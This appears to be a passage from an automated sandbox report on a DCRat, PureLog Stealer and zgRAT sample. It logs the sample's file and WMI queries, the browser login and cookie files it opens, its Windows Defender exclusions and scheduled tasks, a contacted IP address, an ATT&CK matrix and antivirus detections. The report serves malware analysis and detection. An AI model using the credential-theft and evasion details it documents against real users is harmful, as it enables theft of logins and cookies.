                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 3XtEci4Mmo.exe PID: 5444, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 3XtEci4Mmo.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.3XtEci4Mmo.exe.50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1677214516.0000000000052000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Google\Chrome\Application\conhost.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 3XtEci4Mmo.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.3XtEci4Mmo.exe.50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Google\Chrome\Application\conhost.exe, type: DROPPED
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 3XtEci4Mmo.exe PID: 5444, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 3XtEci4Mmo.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.3XtEci4Mmo.exe.50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1677214516.0000000000052000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Google\Chrome\Application\conhost.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 3XtEci4Mmo.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.3XtEci4Mmo.exe.50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Google\Chrome\Application\conhost.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts241
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          DLL Side-Loading                          		11
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		2
                          File and Directory Discovery                          		Remote Services11
                          Archive Collected Data                          		1
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Scheduled Task/Job                          		1
                          DLL Side-Loading                          		11
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory144
                          System Information Discovery                          		Remote Desktop Protocol1
                          Data from Local System                          		1
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          Scheduled Task/Job                          		1
                          Scheduled Task/Job                          		2
                          Obfuscated Files or Information                          		Security Account Manager341
                          Security Software Discovery                          		SMB/Windows Admin Shares1
                          Clipboard Data                          		11
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Software Packing                          		NTDS1
                          Process Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets261
                          Virtualization/Sandbox Evasion                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts133
                          Masquerading                          		Cached Domain Credentials1
                          Application Window Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                          Virtualization/Sandbox Evasion                          		DCSync1
                          Remote System Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                          Process Injection                          		Proc Filesystem1
                          System Network Configuration Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1586105 Sample: 3XtEci4Mmo.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 111 Suricata IDS alerts for network traffic 2->111 113 Found malware configuration 2->113 115 Antivirus detection for dropped file 2->115 117 18 other signatures 2->117 9 TezdDRgSgyeGDKRkzk.exe 2->9         started        12 3XtEci4Mmo.exe 4 46 2->12         started        15 conhost.exe 2->15         started        17 3 other processes 2->17 process3 dnsIp4 83 C:\Users\user\Desktop\yUQAQjKk.log, PE32 9->83 dropped 85 C:\Users\user\Desktop\swyioMDw.log, PE32 9->85 dropped 87 C:\Users\user\Desktop\sTDIJUfq.log, PE32 9->87 dropped 95 22 other malicious files 9->95 dropped 20 cmd.exe 9->20         started        89 C:\Windows\INF\...\TezdDRgSgyeGDKRkzk.exe, PE32 12->89 dropped 91 C:\Users\user\Desktop\zhcyQjUk.log, PE32 12->91 dropped 93 C:\Users\user\Desktop\xfqPuAPp.log, PE32 12->93 dropped 97 31 other malicious files 12->97 dropped 131 Adds a directory exclusion to Windows Defender 12->131 133 Creates processes via WMI 12->133 22 powershell.exe 12->22         started        25 cmd.exe 12->25         started        27 powershell.exe 23 12->27         started        29 10 other processes 12->29 135 Multi AV Scanner detection for dropped file 15->135 99 127.0.0.1 unknown unknown 17->99 file5 signatures6 process7 signatures8 31 TezdDRgSgyeGDKRkzk.exe 20->31         started        36 conhost.exe 20->36         started        121 Loading BitLocker PowerShell Module 22->121 38 schtasks.exe 22->38         started        46 15 other processes 22->46 123 Uses ping.exe to sleep 25->123 125 Drops executables to the windows directory (C:\Windows) and starts them 25->125 127 Uses ping.exe to check the status of other devices and networks 25->127 48 4 other processes 25->48 129 Uses schtasks.exe or at.exe to add and modify task schedules 27->129 40 conhost.exe 27->40         started        42 conhost.exe 29->42         started        44 conhost.exe 29->44         started        50 8 other processes 29->50 process9 dnsIp10 101 185.177.239.66, 49955, 49971, 49984 M247GB Poland 31->101 75 C:\Users\user\Desktop\xLpaQOdH.log, PE32 31->75 dropped 77 C:\Users\user\Desktop\wFqSLbvP.log, PE32 31->77 dropped 79 C:\Users\user\Desktop\udiCoAET.log, PE32 31->79 dropped 81 22 other malicious files 31->81 dropped 103 Tries to harvest and steal browser information (history, passwords, etc) 31->103 105 Adds a directory exclusion to Windows Defender 31->105 52 powershell.exe 31->52         started        55 powershell.exe 31->55         started        57 powershell.exe 31->57         started        59 9 other processes 31->59 107 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 38->107 109 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 38->109 file11 signatures12 process13 signatures14 119 Loading BitLocker PowerShell Module 52->119 61 conhost.exe 52->61         started        63 conhost.exe 55->63         started        65 conhost.exe 57->65         started        67 conhost.exe 59->67         started        69 conhost.exe 59->69         started        71 conhost.exe 59->71         started        73 6 other processes 59->73 process15

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          3XtEci4Mmo.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          3XtEci4Mmo.exe100%AviraHEUR/AGEN.1323342
                          3XtEci4Mmo.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat100%AviraBAT/Delbat.C
                          C:\Program Files\Google\Chrome\Application\conhost.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files\Google\Chrome\Application\conhost.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe100%Joe Sandbox ML
                          C:\Program Files\Google\Chrome\Application\conhost.exe100%Joe Sandbox ML
                          C:\Program Files\Google\Chrome\Application\conhost.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Program Files\Google\Chrome\Application\conhost.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Recovery\conhost.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\AfaiVEic.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\BargBgFj.log29%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\Desktop\BnpyIbbb.log9%ReversingLabs
                          C:\Users\user\Desktop\BwYQnKCg.log3%ReversingLabs
                          C:\Users\user\Desktop\EEJGOfpT.log17%ReversingLabs
                          C:\Users\user\Desktop\EVQZcBiW.log29%ReversingLabs
                          C:\Users\user\Desktop\FAtHPtxq.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\FQiXIcGc.log12%ReversingLabs
                          C:\Users\user\Desktop\FizIvULx.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\HDgqkcCm.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\HTUGeMKX.log25%ReversingLabs
                          C:\Users\user\Desktop\IrkyWqxk.log21%ReversingLabs
                          C:\Users\user\Desktop\KVHoAvPS.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\LBbeHZkL.log8%ReversingLabs
                          C:\Users\user\Desktop\LCxGrujI.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\MgnHXjFm.log25%ReversingLabs
                          C:\Users\user\Desktop\NPXweASH.log9%ReversingLabs
                          C:\Users\user\Desktop\OlTNIjCM.log21%ReversingLabs
                          C:\Users\user\Desktop\QImfPxDF.log16%ReversingLabs
                          C:\Users\user\Desktop\QNGyvuni.log21%ReversingLabs
                          C:\Users\user\Desktop\QWdyfgGf.log12%ReversingLabs
                          C:\Users\user\Desktop\QXRfkjyW.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\QujYzohZ.log8%ReversingLabs
                          C:\Users\user\Desktop\RGOnlxSA.log8%ReversingLabs
                          C:\Users\user\Desktop\RmrNprNr.log17%ReversingLabs
                          C:\Users\user\Desktop\SDpvGwhv.log29%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\Desktop\SYQgAPKa.log9%ReversingLabs
                          C:\Users\user\Desktop\SingkCdX.log9%ReversingLabs
                          C:\Users\user\Desktop\TfOoGCsS.log5%ReversingLabs
                          C:\Users\user\Desktop\ThILVSlx.log9%ReversingLabs
                          C:\Users\user\Desktop\UXWdwFYk.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\VZRFxCWH.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\VkvurCps.log17%ReversingLabs
                          C:\Users\user\Desktop\WBPEscIu.log12%ReversingLabs
                          C:\Users\user\Desktop\WgiUHyMw.log25%ReversingLabs
                          C:\Users\user\Desktop\XQlMiBJi.log21%ReversingLabs
                          C:\Users\user\Desktop\XjnFxUBI.log17%ReversingLabs
